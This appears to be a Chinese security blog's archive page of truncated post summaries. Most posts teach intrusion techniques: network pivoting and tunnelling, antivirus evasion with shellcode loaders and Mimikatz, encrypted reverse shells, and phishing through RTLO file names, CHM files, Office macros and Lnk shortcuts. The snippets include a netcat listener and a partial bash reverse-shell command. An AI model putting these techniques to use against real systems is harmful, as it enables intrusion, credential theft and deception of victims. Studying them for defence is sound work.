08 2022 档案
摘要:跳板攻击之:lcx 端口转发 郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 1 lcx 端口转发原理 LCX项目地址:windworst/LCX: M
阅读全文
摘要:跳板攻击之:dns2tcp 1 dns2tcp简介 dns2tcp 是一个利用 DNS 隧道转发 TCP 连接的工具,支持 KEY 和 TXT 类型的请求,用 C 语言开发。它分为两个部分,服务端和客户端,服务端运行在 linux服务器上,客户端可以运行在 linux 和 windows 上,编译完
阅读全文
摘要:# 跳板攻击之:frp代理转发 [toc] ## 1 frp 介绍 frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。 > [文档 | frp (gofrp.org)]
阅读全文
摘要:# 跳板攻击之:ICMP代理转发与反弹shell >郑重声明: >本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 [toc] ## 1 Pingtunnel 代理转
阅读全文
摘要:创建表格 1. 表格的基本结构2. 表格基本属性3. 表格的行属性4. 单元格属性5. 表格的结构 1. 表格的基本结构 1) 表格的基本结构 <table> <tr> <td>表格第一行第一个单元格</td> <td>表格第一行第二个单元格</td> </tr> <tr> <td>表格中第二行第一
阅读全文
摘要:跳板攻击之:Socks 代理转发 1 Socks 代理转发原理 socks 是一种代理服务,可以说是一个升级版的 lcx。 Socks有 socks 4 和 socks 5 两种类型,socks 4 只支持TCP 协议,而 socks 5支持 TCP/UDP 协议。 通过在靶机上配置 Socks 服
阅读全文
摘要:# 跳板攻击之:EarthWorm代理转发 [toc] ## 1 EarthWorm官方介绍 - EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。 - 下载地址:[rootkiter/EarthWorm:
阅读全文
摘要:HTTP协议 以HTTP/1.1为例,首先我们先了解访问网站时做了哪些操作: 1 URI 1.1 URL与URI URI与URL的关系是:URI包含URL; URL(Uniform Resource Locator,统一资源定位符) 即使用 Web 浏览器等访问 Web 页面时需要输入的网页地址。比
阅读全文
摘要:跳板攻击之:reGeorg 代理转发 郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 1 原理 reGeorg 代理转发是将内网服务器端的数据通过 HT
阅读全文
摘要:跳板攻击之:CS代理转发 1 环境准备 1.1 环境拓扑 1.2 前提 已经取得Win10控制权限 2 配置 Socks 代理 配置 Socks 代理,右击上线的Win10会话选择:代理转发 - Socks 代理 socks 8888 # 关闭 Socks 代理 socks stop 在 Kali
阅读全文
摘要:跳板攻击之:SSH 隧道 郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 1 SSH 隧道原理 SSH 支持双向通信隧道,并会自动加密和解密所有 SSH
阅读全文
摘要:跳板攻击之: MSF 添加路由方式渗透内网 1 Metasploit 跳板攻击: 添加路由方式原理 通过网络层可达实现跳板攻击 缺点是利用环境苛刻,只能在 Metasploit 中使用。易被防火墙拦截流量。 2 实验环境 2.1 建立 meterpreter 反向连接 生成 Metaspolit 后
阅读全文
摘要:跳板攻击之:Netsh端口代理转发 1 命令解析 netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=d
阅读全文
摘要:免杀之:C# XOR Shellcode 1 环境准备 antman1p/ShellCodeRunner: XOR Payload Encryptor for .NET and Payload Runner with Built-in XOR Decryptor (github.com) VS201
阅读全文
摘要:免杀之:Python加载shellcode免杀 使用Python可以做一些加密、混淆,但使用Python编译生成的exe文件普遍比较大 1 Python 加载Shellcode免杀 生成CS的Python类型Shellcode 将生成的Payload中"号中的内容拷贝到下面的脚本中 本地用脚本 #!
阅读全文
摘要:免杀之:MSF后门metasploit-loader免杀 1 metasploit-loader后门代码 rsmudge/metasploit-loader: A client compatible with Metasploit's staging protocol (github.com) 2
阅读全文
摘要:免杀之:Mimikatz 免杀过杀软 Mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取名闻密码和NTLM哈希值的工具,攻击者可以利用这种功能漫游内网。也可以通过明文密码或者hash值进行提权。这款工具机器出名所以被查杀的几率极高。可以通过Github上开放的Mi
阅读全文
摘要:流量加密之:MSF流量加密 1 背景 在MSF中生成shell,并上线运行时。都是通过http https tcp等协议传输。虽然MSF本身会对流量进行加密,但MSF太出名以致于其加密特征容易被IPS,WAF等可以检测带有攻击的特征的设备拦截或记录。 # kali配置nc监听 use exploit
阅读全文
摘要:流量加密之:使用Openssl反弹加密shell 1 背景 直接反弹 shell 方式都有一个缺点:流量是以明文方式进行传输的。容易被IPS,WAF等可以检测带有攻击的特征的设备拦截或记录。 # kali配置nc监听 nc -nvlp 2333 # Centos主机反弹shell bash -i >
阅读全文
摘要:钓鱼攻击之:Flash 网页钓鱼 1 准备资料 Flash网站克隆源码:GitHub - hackxc/xss_flash: Xss之Flash钓鱼 生成后门并捆绑flash的安装程序 VPS服务器,并使用步骤1的资源,搭建好flash网站,下载地址要修改为构造好的后门文件。 有XSS漏洞的网站:G
阅读全文
摘要:钓鱼攻击之:文件钓鱼 MSF 和 CS 都可以生成反弹shell,通过鼠标点击的方式进行触发。exe后门用于钓鱼,主要解决的问题有三个: 后缀名隐藏 文件免杀 文件图标更换 1 RTLO伪装文件钓鱼 RTLO伪装文件解决后缀名隐藏问题 1.1 RTLO简介 RTLO字符全名为Right-To-Lef
阅读全文
摘要:Win下依据端口排查步骤 今天突然发现自己电脑出现7680端口的内网连接,决定看看这个端口是做什么用的 1 排查步骤 确认7680端口连接情况与端口对应进程PID netstat -ano | findstr 7680 # 由下图可知 PID 为 21500 确认PID所对应进程 tasklist
阅读全文
摘要:钓鱼攻击之:CHM电子书钓鱼 1 CHM简介 CHM(Compiled Help Manual)即“已编译的帮助文件”。它是微软新一代的帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。因为使用方容便,形式多样也常被采用作为电子书的格式。而该类型的文件是可以用Windows自带
阅读全文
摘要:钓鱼攻击之:OFFICE 宏后门文件钓鱼 1 宏病毒介绍 1.1 Word 宏 Word的文件建立是通过模板来创建的,模板是为了形成最终文档而提供的特殊文档,模板可以包括以下几个元素:菜单、宏、格式(如备忘录等)。模板是文本、图形和格式编排的蓝图,对于某一类型的所有文档来说,文本、图像和格式编排都是
阅读全文
摘要:钓鱼攻击之:Lnk 文件钓鱼 1 Lnk 钓鱼小试牛刀 利用技巧: 修改完成后,系统会自动根据所执行的程序更改图标,此时可以通过手动更改指定图标,让文件看起来无害。 创建一个Lnk(快捷方式)文件,然后修改它的目标地址如下: # powershell方式注入payload # 使用CS生成web投递
阅读全文
浙公网安备 33010602011771号